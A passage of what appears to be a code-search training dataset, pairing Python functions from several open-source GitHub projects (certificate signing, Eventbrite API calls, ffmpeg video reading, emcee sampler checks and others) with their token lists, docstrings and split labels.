flaviogrossi/sockjs-cyclone
sockjs/cyclone/basehandler.py
https://github.com/flaviogrossi/sockjs-cyclone/blob/d3ca053ec1aa1e85f652347bff562c2319be37a2/sockjs/cyclone/basehandler.py#L45-L53
def enable_cache(self): """ Enable client-side caching for the current request """ self.set_header('Cache-Control', 'max-age=%d, public' % self.CACHE_TIME) now = datetime.datetime.now() expires = now + datetime.timedelta(seconds=self.CACHE_TIME) self.set_header('Expires', expires.strftime('%a, %d %b %Y %H:%M:%S')) self.set_header('access-control-max-age', self.CACHE_TIME)
[ "def", "enable_cache", "(", "self", ")", ":", "self", ".", "set_header", "(", "'Cache-Control'", ",", "'max-age=%d, public'", "%", "self", ".", "CACHE_TIME", ")", "now", "=", "datetime", ".", "datetime", ".", "now", "(", ")", "expires", "=", "now", "+", "datetime", ".", "timedelta", "(", "seconds", "=", "self", ".", "CACHE_TIME", ")", "self", ".", "set_header", "(", "'Expires'", ",", "expires", ".", "strftime", "(", "'%a, %d %b %Y %H:%M:%S'", ")", ")", "self", ".", "set_header", "(", "'access-control-max-age'", ",", "self", ".", "CACHE_TIME", ")" ]
Enable client-side caching for the current request
[ "Enable", "client", "-", "side", "caching", "for", "the", "current", "request" ]
python
train
eventbrite/eventbrite-sdk-python
eventbrite/access_methods.py
https://github.com/eventbrite/eventbrite-sdk-python/blob/f2e5dc5aa1aa3e45766de13f16fd65722163d91a/eventbrite/access_methods.py#L137-L144
def delete_event(self, id, **data): """ DELETE /events/:id/ Deletes an event if the delete is permitted. In order for a delete to be permitted, there must be no pending or completed orders. Returns a boolean indicating success or failure of the delete. """ return self.delete("/events/{0}/".format(id), data=data)
[ "def", "delete_event", "(", "self", ",", "id", ",", "*", "*", "data", ")", ":", "return", "self", ".", "delete", "(", "\"/events/{0}/\"", ".", "format", "(", "id", ")", ",", "data", "=", "data", ")" ]
DELETE /events/:id/ Deletes an event if the delete is permitted. In order for a delete to be permitted, there must be no pending or completed orders. Returns a boolean indicating success or failure of the delete.
[ "DELETE", "/", "events", "/", ":", "id", "/", "Deletes", "an", "event", "if", "the", "delete", "is", "permitted", ".", "In", "order", "for", "a", "delete", "to", "be", "permitted", "there", "must", "be", "no", "pending", "or", "completed", "orders", ".", "Returns", "a", "boolean", "indicating", "success", "or", "failure", "of", "the", "delete", "." ]
python
train
LLNL/certipy
certipy/certipy.py
https://github.com/LLNL/certipy/blob/8705a8ba32655e12021d2893cf1c3c98c697edd7/certipy/certipy.py#L487-L522
def sign(self, req, issuer_cert_key, validity_period, digest="sha256", extensions=None, serial=0): """ Generate a certificate given a certificate request. Arguments: req - Certificate request to use issuer_cert - The certificate of the issuer issuer_key - The private key of the issuer not_before - Timestamp (relative to now) when the certificate starts being valid not_after - Timestamp (relative to now) when the certificate stops being valid digest - Digest method to use for signing, default is sha256 Returns: The signed certificate in an X509 object """ issuer_cert, issuer_key = issuer_cert_key not_before, not_after = validity_period cert = crypto.X509() cert.set_serial_number(serial) cert.gmtime_adj_notBefore(not_before) cert.gmtime_adj_notAfter(not_after) cert.set_issuer(issuer_cert.get_subject()) cert.set_subject(req.get_subject()) cert.set_pubkey(req.get_pubkey()) if extensions: for ext in extensions: if callable(ext): ext = ext(cert) cert.add_extensions([ext]) cert.sign(issuer_key, digest) return cert
[ "def", "sign", "(", "self", ",", "req", ",", "issuer_cert_key", ",", "validity_period", ",", "digest", "=", "\"sha256\"", ",", "extensions", "=", "None", ",", "serial", "=", "0", ")", ":", "issuer_cert", ",", "issuer_key", "=", "issuer_cert_key", "not_before", ",", "not_after", "=", "validity_period", "cert", "=", "crypto", ".", "X509", "(", ")", "cert", ".", "set_serial_number", "(", "serial", ")", "cert", ".", "gmtime_adj_notBefore", "(", "not_before", ")", "cert", ".", "gmtime_adj_notAfter", "(", "not_after", ")", "cert", ".", "set_issuer", "(", "issuer_cert", ".", "get_subject", "(", ")", ")", "cert", ".", "set_subject", "(", "req", ".", "get_subject", "(", ")", ")", "cert", ".", "set_pubkey", "(", "req", ".", "get_pubkey", "(", ")", ")", "if", "extensions", ":", "for", "ext", "in", "extensions", ":", "if", "callable", "(", "ext", ")", ":", "ext", "=", "ext", "(", "cert", ")", "cert", ".", "add_extensions", "(", "[", "ext", "]", ")", "cert", ".", "sign", "(", "issuer_key", ",", "digest", ")", "return", "cert" ]
Generate a certificate given a certificate request. Arguments: req - Certificate request to use issuer_cert - The certificate of the issuer issuer_key - The private key of the issuer not_before - Timestamp (relative to now) when the certificate starts being valid not_after - Timestamp (relative to now) when the certificate stops being valid digest - Digest method to use for signing, default is sha256 Returns: The signed certificate in an X509 object
[ "Generate", "a", "certificate", "given", "a", "certificate", "request", "." ]
python
train
ruipgil/TrackToTrip
tracktotrip/similarity.py
https://github.com/ruipgil/TrackToTrip/blob/5537c14ee9748091b5255b658ab528e1d6227f99/tracktotrip/similarity.py#L197-L215
def bounding_box_from(points, i, i1, thr): """Creates bounding box for a line segment Args: points (:obj:`list` of :obj:`Point`) i (int): Line segment start, index in points array i1 (int): Line segment end, index in points array Returns: (float, float, float, float): with bounding box min x, min y, max x and max y """ pi = points[i] pi1 = points[i1] min_lat = min(pi.lat, pi1.lat) min_lon = min(pi.lon, pi1.lon) max_lat = max(pi.lat, pi1.lat) max_lon = max(pi.lon, pi1.lon) return min_lat-thr, min_lon-thr, max_lat+thr, max_lon+thr
[ "def", "bounding_box_from", "(", "points", ",", "i", ",", "i1", ",", "thr", ")", ":", "pi", "=", "points", "[", "i", "]", "pi1", "=", "points", "[", "i1", "]", "min_lat", "=", "min", "(", "pi", ".", "lat", ",", "pi1", ".", "lat", ")", "min_lon", "=", "min", "(", "pi", ".", "lon", ",", "pi1", ".", "lon", ")", "max_lat", "=", "max", "(", "pi", ".", "lat", ",", "pi1", ".", "lat", ")", "max_lon", "=", "max", "(", "pi", ".", "lon", ",", "pi1", ".", "lon", ")", "return", "min_lat", "-", "thr", ",", "min_lon", "-", "thr", ",", "max_lat", "+", "thr", ",", "max_lon", "+", "thr" ]
Creates bounding box for a line segment Args: points (:obj:`list` of :obj:`Point`) i (int): Line segment start, index in points array i1 (int): Line segment end, index in points array Returns: (float, float, float, float): with bounding box min x, min y, max x and max y
[ "Creates", "bounding", "box", "for", "a", "line", "segment" ]
python
train
dw/alembic-autogenerate-enums
alembic_autogenerate_enums.py
https://github.com/dw/alembic-autogenerate-enums/blob/80f2cbd2bbe4c4de8ceedac4929a42dcbc7e6380/alembic_autogenerate_enums.py#L15-L43
def get_defined_enums(conn, schema): """ Return a dict mapping PostgreSQL enumeration types to the set of their defined values. :param conn: SQLAlchemy connection instance. :param str schema: Schema name (e.g. "public"). :returns dict: { "my_enum": frozenset(["a", "b", "c"]), } """ sql = """ SELECT pg_catalog.format_type(t.oid, NULL), ARRAY(SELECT enumlabel FROM pg_catalog.pg_enum WHERE enumtypid = t.oid) FROM pg_catalog.pg_type t LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace WHERE t.typtype = 'e' AND n.nspname = %s """ return {r[0]: frozenset(r[1]) for r in conn.execute(sql, (schema,))}
[ "def", "get_defined_enums", "(", "conn", ",", "schema", ")", ":", "sql", "=", "\"\"\"\n SELECT\n pg_catalog.format_type(t.oid, NULL),\n ARRAY(SELECT enumlabel\n FROM pg_catalog.pg_enum\n WHERE enumtypid = t.oid)\n FROM pg_catalog.pg_type t\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace\n WHERE\n t.typtype = 'e'\n AND n.nspname = %s\n \"\"\"", "return", "{", "r", "[", "0", "]", ":", "frozenset", "(", "r", "[", "1", "]", ")", "for", "r", "in", "conn", ".", "execute", "(", "sql", ",", "(", "schema", ",", ")", ")", "}" ]
Return a dict mapping PostgreSQL enumeration types to the set of their defined values. :param conn: SQLAlchemy connection instance. :param str schema: Schema name (e.g. "public"). :returns dict: { "my_enum": frozenset(["a", "b", "c"]), }
[ "Return", "a", "dict", "mapping", "PostgreSQL", "enumeration", "types", "to", "the", "set", "of", "their", "defined", "values", "." ]
python
train
singularityhub/sregistry-cli
sregistry/client/backend.py
https://github.com/singularityhub/sregistry-cli/blob/abc96140a1d15b5e96d83432e1e0e1f4f8f36331/sregistry/client/backend.py#L178-L196
def delete_backend(backend): '''delete a backend, and update the secrets file ''' settings = read_client_secrets() if backend in settings: del settings[backend] # If the backend was the active client, remove too if 'SREGISTRY_CLIENT' in settings: if settings['SREGISTRY_CLIENT'] == backend: del settings['SREGISTRY_CLIENT'] update_secrets(settings) print('[delete] %s' %backend) else: if backend is not None: print('%s is not a known client.' %backend) else: print('Please specify a backend to delete.')
[ "def", "delete_backend", "(", "backend", ")", ":", "settings", "=", "read_client_secrets", "(", ")", "if", "backend", "in", "settings", ":", "del", "settings", "[", "backend", "]", "# If the backend was the active client, remove too", "if", "'SREGISTRY_CLIENT'", "in", "settings", ":", "if", "settings", "[", "'SREGISTRY_CLIENT'", "]", "==", "backend", ":", "del", "settings", "[", "'SREGISTRY_CLIENT'", "]", "update_secrets", "(", "settings", ")", "print", "(", "'[delete] %s'", "%", "backend", ")", "else", ":", "if", "backend", "is", "not", "None", ":", "print", "(", "'%s is not a known client.'", "%", "backend", ")", "else", ":", "print", "(", "'Please specify a backend to delete.'", ")" ]
delete a backend, and update the secrets file
[ "delete", "a", "backend", "and", "update", "the", "secrets", "file" ]
python
test
yolothreat/utilitybelt
utilitybelt/utilitybelt.py
https://github.com/yolothreat/utilitybelt/blob/55ac6c31f87963d5e97be0402a4343c84846d118/utilitybelt/utilitybelt.py#L172-L187
def is_hash(fhash): """Returns true for valid hashes, false for invalid.""" # Intentionally doing if/else statement for ease of testing and reading if re.match(re_md5, fhash): return True elif re.match(re_sha1, fhash): return True elif re.match(re_sha256, fhash): return True elif re.match(re_sha512, fhash): return True elif re.match(re_ssdeep, fhash): return True else: return False
[ "def", "is_hash", "(", "fhash", ")", ":", "# Intentionally doing if/else statement for ease of testing and reading", "if", "re", ".", "match", "(", "re_md5", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha1", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha256", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha512", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_ssdeep", ",", "fhash", ")", ":", "return", "True", "else", ":", "return", "False" ]
Returns true for valid hashes, false for invalid.
[ "Returns", "true", "for", "valid", "hashes", "false", "for", "invalid", "." ]
python
train
watson-developer-cloud/python-sdk
ibm_watson/natural_language_understanding_v1.py
https://github.com/watson-developer-cloud/python-sdk/blob/4c2c9df4466fcde88975da9ecd834e6ba95eb353/ibm_watson/natural_language_understanding_v1.py#L3041-L3052
def _from_dict(cls, _dict): """Initialize a SentimentResult object from a json dictionary.""" args = {} if 'document' in _dict: args['document'] = DocumentSentimentResults._from_dict( _dict.get('document')) if 'targets' in _dict: args['targets'] = [ TargetedSentimentResults._from_dict(x) for x in (_dict.get('targets')) ] return cls(**args)
[ "def", "_from_dict", "(", "cls", ",", "_dict", ")", ":", "args", "=", "{", "}", "if", "'document'", "in", "_dict", ":", "args", "[", "'document'", "]", "=", "DocumentSentimentResults", ".", "_from_dict", "(", "_dict", ".", "get", "(", "'document'", ")", ")", "if", "'targets'", "in", "_dict", ":", "args", "[", "'targets'", "]", "=", "[", "TargetedSentimentResults", ".", "_from_dict", "(", "x", ")", "for", "x", "in", "(", "_dict", ".", "get", "(", "'targets'", ")", ")", "]", "return", "cls", "(", "*", "*", "args", ")" ]
Initialize a SentimentResult object from a json dictionary.
[ "Initialize", "a", "SentimentResult", "object", "from", "a", "json", "dictionary", "." ]
python
train
funilrys/PyFunceble
PyFunceble/__init__.py
https://github.com/funilrys/PyFunceble/blob/cdf69cbde120199171f7158e1c33635753e6e2f5/PyFunceble/__init__.py#L396-L421
def url_syntax_check(url): # pragma: no cover """ Check the syntax of the given URL. :param url: The URL to check the syntax for. :type url: str :return: The syntax validity. :rtype: bool .. warning:: If an empty or a non-string :code:`url` is given, we return :code:`None`. """ if url and isinstance(url, str): # The given URL is not empty nor None. # and # * The given URL is a string. # We silently load the configuration. load_config(True) return Check(url).is_url_valid() # We return None, there is nothing to check. return None
[ "def", "url_syntax_check", "(", "url", ")", ":", "# pragma: no cover", "if", "url", "and", "isinstance", "(", "url", ",", "str", ")", ":", "# The given URL is not empty nor None.", "# and", "# * The given URL is a string.", "# We silently load the configuration.", "load_config", "(", "True", ")", "return", "Check", "(", "url", ")", ".", "is_url_valid", "(", ")", "# We return None, there is nothing to check.", "return", "None" ]
Check the syntax of the given URL. :param url: The URL to check the syntax for. :type url: str :return: The syntax validity. :rtype: bool .. warning:: If an empty or a non-string :code:`url` is given, we return :code:`None`.
[ "Check", "the", "syntax", "of", "the", "given", "URL", "." ]
python
test
radujica/baloo
baloo/core/indexes/multi.py
https://github.com/radujica/baloo/blob/f6e05e35b73a75e8a300754c6bdc575e5f2d53b9/baloo/core/indexes/multi.py#L213-L225
def dropna(self): """Returns MultiIndex without any rows containing null values according to Baloo's convention. Returns ------- MultiIndex MultiIndex with no null values. """ not_nas = [v.notna() for v in self.values] and_filter = reduce(lambda x, y: x & y, not_nas) return self[and_filter]
[ "def", "dropna", "(", "self", ")", ":", "not_nas", "=", "[", "v", ".", "notna", "(", ")", "for", "v", "in", "self", ".", "values", "]", "and_filter", "=", "reduce", "(", "lambda", "x", ",", "y", ":", "x", "&", "y", ",", "not_nas", ")", "return", "self", "[", "and_filter", "]" ]
Returns MultiIndex without any rows containing null values according to Baloo's convention. Returns ------- MultiIndex MultiIndex with no null values.
[ "Returns", "MultiIndex", "without", "any", "rows", "containing", "null", "values", "according", "to", "Baloo", "s", "convention", "." ]
python
train
b3j0f/schema
b3j0f/schema/lang/python.py
https://github.com/b3j0f/schema/blob/1c88c23337f5fef50254e65bd407112c43396dd9/b3j0f/schema/lang/python.py#L108-L121
def buildschema(_cls=None, **kwargs): """Class decorator used to build a schema from the decorate class. :param type _cls: class to decorate. :param kwargs: schema attributes to set. :rtype: type :return: schema class. """ if _cls is None: return lambda _cls: buildschema(_cls=_cls, **kwargs) result = build(_cls, **kwargs) return result
[ "def", "buildschema", "(", "_cls", "=", "None", ",", "*", "*", "kwargs", ")", ":", "if", "_cls", "is", "None", ":", "return", "lambda", "_cls", ":", "buildschema", "(", "_cls", "=", "_cls", ",", "*", "*", "kwargs", ")", "result", "=", "build", "(", "_cls", ",", "*", "*", "kwargs", ")", "return", "result" ]
Class decorator used to build a schema from the decorate class. :param type _cls: class to decorate. :param kwargs: schema attributes to set. :rtype: type :return: schema class.
[ "Class", "decorator", "used", "to", "build", "a", "schema", "from", "the", "decorate", "class", "." ]
python
train
crdoconnor/strictyaml
strictyaml/yamllocation.py
https://github.com/crdoconnor/strictyaml/blob/efdac7f89e81679fc95686288cd32b9563fde609/strictyaml/yamllocation.py#L130-L145
def fork(self, strictindex, new_value): """ Return a chunk referring to the same location in a duplicated document. Used when modifying a YAML chunk so that the modification can be validated before changing it. """ forked_chunk = YAMLChunk( deepcopy(self._ruamelparsed), pointer=self.pointer, label=self.label, key_association=copy(self._key_association), ) forked_chunk.contents[self.ruamelindex(strictindex)] = new_value.as_marked_up() forked_chunk.strictparsed()[strictindex] = deepcopy(new_value.as_marked_up()) return forked_chunk
[ "def", "fork", "(", "self", ",", "strictindex", ",", "new_value", ")", ":", "forked_chunk", "=", "YAMLChunk", "(", "deepcopy", "(", "self", ".", "_ruamelparsed", ")", ",", "pointer", "=", "self", ".", "pointer", ",", "label", "=", "self", ".", "label", ",", "key_association", "=", "copy", "(", "self", ".", "_key_association", ")", ",", ")", "forked_chunk", ".", "contents", "[", "self", ".", "ruamelindex", "(", "strictindex", ")", "]", "=", "new_value", ".", "as_marked_up", "(", ")", "forked_chunk", ".", "strictparsed", "(", ")", "[", "strictindex", "]", "=", "deepcopy", "(", "new_value", ".", "as_marked_up", "(", ")", ")", "return", "forked_chunk" ]
Return a chunk referring to the same location in a duplicated document. Used when modifying a YAML chunk so that the modification can be validated before changing it.
[ "Return", "a", "chunk", "referring", "to", "the", "same", "location", "in", "a", "duplicated", "document", "." ]
python
train
KelSolaar/Umbra
umbra/ui/views.py
https://github.com/KelSolaar/Umbra/blob/66f45f08d9d723787f1191989f8b0dda84b412ce/umbra/ui/views.py#L309-L340
def get_view_nodes_from_indexes(self, *indexes): """ Returns the View Nodes from given indexes. :param view: View. :type view: QWidget :param \*indexes: Indexes. :type \*indexes: list :return: View nodes. :rtype: dict """ nodes = {} model = self.model() if not model: return nodes if not hasattr(model, "get_node"): raise NotImplementedError( "{0} | '{1}' Model doesn't implement a 'get_node' method!".format(__name__, model)) if not hasattr(model, "get_attribute"): raise NotImplementedError( "{0} | '{1}' Model doesn't implement a 'get_attribute' method!".format(__name__, model)) for index in indexes: node = model.get_node(index) if not node in nodes: nodes[node] = [] attribute = model.get_attribute(node, index.column()) attribute and nodes[node].append(attribute) return nodes
[ "def", "get_view_nodes_from_indexes", "(", "self", ",", "*", "indexes", ")", ":", "nodes", "=", "{", "}", "model", "=", "self", ".", "model", "(", ")", "if", "not", "model", ":", "return", "nodes", "if", "not", "hasattr", "(", "model", ",", "\"get_node\"", ")", ":", "raise", "NotImplementedError", "(", "\"{0} | '{1}' Model doesn't implement a 'get_node' method!\"", ".", "format", "(", "__name__", ",", "model", ")", ")", "if", "not", "hasattr", "(", "model", ",", "\"get_attribute\"", ")", ":", "raise", "NotImplementedError", "(", "\"{0} | '{1}' Model doesn't implement a 'get_attribute' method!\"", ".", "format", "(", "__name__", ",", "model", ")", ")", "for", "index", "in", "indexes", ":", "node", "=", "model", ".", "get_node", "(", "index", ")", "if", "not", "node", "in", "nodes", ":", "nodes", "[", "node", "]", "=", "[", "]", "attribute", "=", "model", ".", "get_attribute", "(", "node", ",", "index", ".", "column", "(", ")", ")", "attribute", "and", "nodes", "[", "node", "]", ".", "append", "(", "attribute", ")", "return", "nodes" ]
Returns the View Nodes from given indexes. :param view: View. :type view: QWidget :param \*indexes: Indexes. :type \*indexes: list :return: View nodes. :rtype: dict
[ "Returns", "the", "View", "Nodes", "from", "given", "indexes", "." ]
python
train
Cymmetria/honeycomb
honeycomb/utils/config_utils.py
https://github.com/Cymmetria/honeycomb/blob/33ea91b5cf675000e4e85dd02efe580ea6e95c86/honeycomb/utils/config_utils.py#L49-L57
def validate_config_parameters(config_json, allowed_keys, allowed_types): """Validate parameters in config file.""" custom_fields = config_json.get(defs.PARAMETERS, []) for field in custom_fields: validate_field(field, allowed_keys, allowed_types) default = field.get(defs.DEFAULT) field_type = field.get(defs.TYPE) if default: validate_field_matches_type(field[defs.VALUE], default, field_type)
[ "def", "validate_config_parameters", "(", "config_json", ",", "allowed_keys", ",", "allowed_types", ")", ":", "custom_fields", "=", "config_json", ".", "get", "(", "defs", ".", "PARAMETERS", ",", "[", "]", ")", "for", "field", "in", "custom_fields", ":", "validate_field", "(", "field", ",", "allowed_keys", ",", "allowed_types", ")", "default", "=", "field", ".", "get", "(", "defs", ".", "DEFAULT", ")", "field_type", "=", "field", ".", "get", "(", "defs", ".", "TYPE", ")", "if", "default", ":", "validate_field_matches_type", "(", "field", "[", "defs", ".", "VALUE", "]", ",", "default", ",", "field_type", ")" ]
Validate parameters in config file.
[ "Validate", "parameters", "in", "config", "file", "." ]
python
train
nameko/nameko
nameko/events.py
https://github.com/nameko/nameko/blob/88d7e5211de4fcc1c34cd7f84d7c77f0619c5f5d/nameko/events.py#L86-L99
def get_dependency(self, worker_ctx): """ Inject a dispatch method onto the service instance """ extra_headers = self.get_message_headers(worker_ctx) def dispatch(event_type, event_data): self.publisher.publish( event_data, exchange=self.exchange, routing_key=event_type, extra_headers=extra_headers ) return dispatch
[ "def", "get_dependency", "(", "self", ",", "worker_ctx", ")", ":", "extra_headers", "=", "self", ".", "get_message_headers", "(", "worker_ctx", ")", "def", "dispatch", "(", "event_type", ",", "event_data", ")", ":", "self", ".", "publisher", ".", "publish", "(", "event_data", ",", "exchange", "=", "self", ".", "exchange", ",", "routing_key", "=", "event_type", ",", "extra_headers", "=", "extra_headers", ")", "return", "dispatch" ]
Inject a dispatch method onto the service instance
[ "Inject", "a", "dispatch", "method", "onto", "the", "service", "instance" ]
python
train
aiortc/aioice
aioice/ice.py
https://github.com/aiortc/aioice/blob/a04d810d94ec2d00eca9ce01eacca74b3b086616/aioice/ice.py#L33-L46
def get_host_addresses(use_ipv4, use_ipv6): """ Get local IP addresses. """ addresses = [] for interface in netifaces.interfaces(): ifaddresses = netifaces.ifaddresses(interface) for address in ifaddresses.get(socket.AF_INET, []): if use_ipv4 and address['addr'] != '127.0.0.1': addresses.append(address['addr']) for address in ifaddresses.get(socket.AF_INET6, []): if use_ipv6 and address['addr'] != '::1' and '%' not in address['addr']: addresses.append(address['addr']) return addresses
[ "def", "get_host_addresses", "(", "use_ipv4", ",", "use_ipv6", ")", ":", "addresses", "=", "[", "]", "for", "interface", "in", "netifaces", ".", "interfaces", "(", ")", ":", "ifaddresses", "=", "netifaces", ".", "ifaddresses", "(", "interface", ")", "for", "address", "in", "ifaddresses", ".", "get", "(", "socket", ".", "AF_INET", ",", "[", "]", ")", ":", "if", "use_ipv4", "and", "address", "[", "'addr'", "]", "!=", "'127.0.0.1'", ":", "addresses", ".", "append", "(", "address", "[", "'addr'", "]", ")", "for", "address", "in", "ifaddresses", ".", "get", "(", "socket", ".", "AF_INET6", ",", "[", "]", ")", ":", "if", "use_ipv6", "and", "address", "[", "'addr'", "]", "!=", "'::1'", "and", "'%'", "not", "in", "address", "[", "'addr'", "]", ":", "addresses", ".", "append", "(", "address", "[", "'addr'", "]", ")", "return", "addresses" ]
Get local IP addresses.
[ "Get", "local", "IP", "addresses", "." ]
python
train
jim-easterbrook/pyctools
src/pyctools/components/io/videofilereader.py
https://github.com/jim-easterbrook/pyctools/blob/2a958665326892f45f249bebe62c2c23f306732b/src/pyctools/components/io/videofilereader.py#L78-L135
def file_reader(self): """Generator process to read file""" self.update_config() path = self.config['path'] # open file to get dimensions with self.subprocess( ['ffmpeg', '-v', 'info', '-y', '-an', '-vn', '-i', path, '-'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open(os.devnull), universal_newlines=True) as sp: for line in sp.stderr.read().splitlines(): match = re.search('(\d{2,})x(\d{2,})', line) if match: xlen, ylen = map(int, match.groups()) break else: self.logger.critical('Failed to open %s', path) return # read file repeatedly to allow looping while True: # can change config once per outer loop self.update_config() bit16 = self.config['16bit'] self.frame_type = self.config['type'] self.metadata = Metadata().from_file(path) audit = self.metadata.get('audit') audit += 'data = %s\n' % path audit += ' type: %s, 16bit: %s\n' % (self.frame_type, bit16) self.metadata.set('audit', audit) bps = {'RGB': 3, 'Y': 1}[self.frame_type] pix_fmt = {'RGB': ('rgb24', 'rgb48le'), 'Y': ('gray', 'gray16le')}[self.frame_type][bit16] bytes_per_line = xlen * ylen * bps if bit16: bytes_per_line *= 2 # open file to read data with self.subprocess( ['ffmpeg', '-v', 'warning', '-an', '-i', path, '-f', 'image2pipe', '-pix_fmt', pix_fmt, '-c:v', 'rawvideo', '-'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open(os.devnull), bufsize=bytes_per_line) as sp: while True: try: raw_data = sp.stdout.read(bytes_per_line) except Exception as ex: self.logger.exception(ex) return if len(raw_data) < bytes_per_line: break if bit16: image = numpy.fromstring(raw_data, dtype=numpy.uint16) image = image.astype(pt_float) / pt_float(256.0) else: image = numpy.fromstring(raw_data, dtype=numpy.uint8) yield image.reshape((ylen, xlen, bps)) self.update_config() if self.frame_no == 0 or self.config['looping'] == 'off': return
[ "def", "file_reader", "(", "self", ")", ":", "self", ".", "update_config", "(", ")", "path", "=", "self", ".", "config", "[", "'path'", "]", "# open file to get dimensions", "with", "self", ".", "subprocess", "(", "[", "'ffmpeg'", ",", "'-v'", ",", "'info'", ",", "'-y'", ",", "'-an'", ",", "'-vn'", ",", "'-i'", ",", "path", ",", "'-'", "]", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "stdin", "=", "open", "(", "os", ".", "devnull", ")", ",", "universal_newlines", "=", "True", ")", "as", "sp", ":", "for", "line", "in", "sp", ".", "stderr", ".", "read", "(", ")", ".", "splitlines", "(", ")", ":", "match", "=", "re", ".", "search", "(", "'(\\d{2,})x(\\d{2,})'", ",", "line", ")", "if", "match", ":", "xlen", ",", "ylen", "=", "map", "(", "int", ",", "match", ".", "groups", "(", ")", ")", "break", "else", ":", "self", ".", "logger", ".", "critical", "(", "'Failed to open %s'", ",", "path", ")", "return", "# read file repeatedly to allow looping", "while", "True", ":", "# can change config once per outer loop", "self", ".", "update_config", "(", ")", "bit16", "=", "self", ".", "config", "[", "'16bit'", "]", "self", ".", "frame_type", "=", "self", ".", "config", "[", "'type'", "]", "self", ".", "metadata", "=", "Metadata", "(", ")", ".", "from_file", "(", "path", ")", "audit", "=", "self", ".", "metadata", ".", "get", "(", "'audit'", ")", "audit", "+=", "'data = %s\\n'", "%", "path", "audit", "+=", "' type: %s, 16bit: %s\\n'", "%", "(", "self", ".", "frame_type", ",", "bit16", ")", "self", ".", "metadata", ".", "set", "(", "'audit'", ",", "audit", ")", "bps", "=", "{", "'RGB'", ":", "3", ",", "'Y'", ":", "1", "}", "[", "self", ".", "frame_type", "]", "pix_fmt", "=", "{", "'RGB'", ":", "(", "'rgb24'", ",", "'rgb48le'", ")", ",", "'Y'", ":", "(", "'gray'", ",", "'gray16le'", ")", "}", "[", "self", ".", "frame_type", "]", "[", "bit16", "]", "bytes_per_line", "=", "xlen", "*", "ylen", "*", "bps", "if", "bit16", ":", "bytes_per_line", "*=", "2", "# open file to read data", "with", "self", ".", "subprocess", "(", "[", "'ffmpeg'", ",", "'-v'", ",", "'warning'", ",", "'-an'", ",", "'-i'", ",", "path", ",", "'-f'", ",", "'image2pipe'", ",", "'-pix_fmt'", ",", "pix_fmt", ",", "'-c:v'", ",", "'rawvideo'", ",", "'-'", "]", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "stdin", "=", "open", "(", "os", ".", "devnull", ")", ",", "bufsize", "=", "bytes_per_line", ")", "as", "sp", ":", "while", "True", ":", "try", ":", "raw_data", "=", "sp", ".", "stdout", ".", "read", "(", "bytes_per_line", ")", "except", "Exception", "as", "ex", ":", "self", ".", "logger", ".", "exception", "(", "ex", ")", "return", "if", "len", "(", "raw_data", ")", "<", "bytes_per_line", ":", "break", "if", "bit16", ":", "image", "=", "numpy", ".", "fromstring", "(", "raw_data", ",", "dtype", "=", "numpy", ".", "uint16", ")", "image", "=", "image", ".", "astype", "(", "pt_float", ")", "/", "pt_float", "(", "256.0", ")", "else", ":", "image", "=", "numpy", ".", "fromstring", "(", "raw_data", ",", "dtype", "=", "numpy", ".", "uint8", ")", "yield", "image", ".", "reshape", "(", "(", "ylen", ",", "xlen", ",", "bps", ")", ")", "self", ".", "update_config", "(", ")", "if", "self", ".", "frame_no", "==", "0", "or", "self", ".", "config", "[", "'looping'", "]", "==", "'off'", ":", "return" ]
Generator process to read file
[ "Generator", "process", "to", "read", "file" ]
python
train
arviz-devs/arviz
arviz/data/io_emcee.py
https://github.com/arviz-devs/arviz/blob/d04d8da07f029fd2931f48d2f7f324cf393e5277/arviz/data/io_emcee.py#L6-L58
def _verify_names(sampler, var_names, arg_names): """Make sure var_names and arg_names are assigned reasonably. This is meant to run before loading emcee objects into InferenceData. In case var_names or arg_names is None, will provide defaults. If they are not None, it verifies there are the right number of them. Throws a ValueError in case validation fails. Parameters ---------- sampler : emcee.EnsembleSampler Fitted emcee sampler var_names : list[str] or None Names for the emcee parameters arg_names : list[str] or None Names for the args/observations provided to emcee Returns ------- list[str], list[str] Defaults for var_names and arg_names """ # There are 3 possible cases: emcee2, emcee3 and sampler read from h5 file (emcee3 only) if hasattr(sampler, "args"): num_vars = sampler.chain.shape[-1] num_args = len(sampler.args) elif hasattr(sampler, "log_prob_fn"): num_vars = sampler.get_chain().shape[-1] num_args = len(sampler.log_prob_fn.args) else: num_vars = sampler.get_chain().shape[-1] num_args = 0 # emcee only stores the posterior samples if var_names is None: var_names = ["var_{}".format(idx) for idx in range(num_vars)] if arg_names is None: arg_names = ["arg_{}".format(idx) for idx in range(num_args)] if len(var_names) != num_vars: raise ValueError( "The sampler has {} variables, but only {} var_names were provided!".format( num_vars, len(var_names) ) ) if len(arg_names) != num_args: raise ValueError( "The sampler has {} args, but only {} arg_names were provided!".format( num_args, len(arg_names) ) ) return var_names, arg_names
[ "def", "_verify_names", "(", "sampler", ",", "var_names", ",", "arg_names", ")", ":", "# There are 3 possible cases: emcee2, emcee3 and sampler read from h5 file (emcee3 only)", "if", "hasattr", "(", "sampler", ",", "\"args\"", ")", ":", "num_vars", "=", "sampler", ".", "chain", ".", "shape", "[", "-", "1", "]", "num_args", "=", "len", "(", "sampler", ".", "args", ")", "elif", "hasattr", "(", "sampler", ",", "\"log_prob_fn\"", ")", ":", "num_vars", "=", "sampler", ".", "get_chain", "(", ")", ".", "shape", "[", "-", "1", "]", "num_args", "=", "len", "(", "sampler", ".", "log_prob_fn", ".", "args", ")", "else", ":", "num_vars", "=", "sampler", ".", "get_chain", "(", ")", ".", "shape", "[", "-", "1", "]", "num_args", "=", "0", "# emcee only stores the posterior samples", "if", "var_names", "is", "None", ":", "var_names", "=", "[", "\"var_{}\"", ".", "format", "(", "idx", ")", "for", "idx", "in", "range", "(", "num_vars", ")", "]", "if", "arg_names", "is", "None", ":", "arg_names", "=", "[", "\"arg_{}\"", ".", "format", "(", "idx", ")", "for", "idx", "in", 